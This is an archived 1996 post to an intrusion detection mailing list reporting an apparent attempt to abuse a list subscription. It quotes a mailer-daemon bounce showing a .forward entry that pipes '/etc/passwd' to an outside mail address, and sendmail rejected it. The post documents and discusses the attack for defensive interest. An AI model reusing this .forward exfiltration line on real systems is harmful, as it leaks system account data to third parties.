[660] in Intrusion Detection Systems
IDS Mailing List detects intrusion attempt ?
daemon@ATHENA.MIT.EDU (Justin J. Lister)
Mon Mar 18 05:00:22 1996
To: ids@uow.edu.au (Intrusion Detection System Mailing List)
Date: Fri, 15 Mar 1996 13:56:04 +1100 (EST)
Cc: postmaster@pollux.cs.uga.edu
From: ruf@osiris.cs.uow.edu.au (Justin J. Lister)
Reply-To: ids@uow.edu.au
G'day,
I dont know if this was a deliberate attempt to be amusing
(definately to early for April Fools) but the owner-ids received an
interesting Returned: mail from MAILER-DAEMON@pollux.cs.uga.edu.
Could be a first 'Intrusion Detection List catches attempted intrusion'
(hey Steve do you have an intrusion penetration rule for this scenario).
The mail was in response to a subscription request to IDS (attempting to
deliver the list introduction message).
The Headers from MAILER-DAEMON:
Date: Thu, 14 Mar 1996 21:20:34 -0500 (EST)
From: Mail Delivery Subsystem <MAILER-DAEMON@pollux.cs.uga.edu>
Subject: Returned mail: /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files
To: <owner-ids@uow.edu.au>
The original message was received at Thu, 14 Mar 1996 21:20:30 -0500 (EST)
from wyrm.its.uow.edu.au [130.130.68.1]
----- The following addresses have delivery notifications -----
|/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd (unrecoverable error)
(expanded from: <lodwick@pollux.cs.uga.edu>)
----- Transcript of session follows -----
553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
/etc/passwd... Unbalanced '<'
550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
/etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma
iling to files
--
+---------------------+--------------------------------------------------+
| ____ ___ | Justin Lister ruf@cs.uow.edu.au |
| | \\ /\ __\ | Center for Computer Security Research |
| | |) / \_/ / |_ | Dept. Computer Science voice: 61-42-214-327|
| | _ \\ /| _/ | University of Wollongong fax: 61-42-214-329|
| |_/ \/ \_/ |_| (tm) | LiNuX- iNTEL justification. mobile: 61-0411405217|
| | Computer Security a utopian dream... |
+---------------------+--------------------------------------------------+
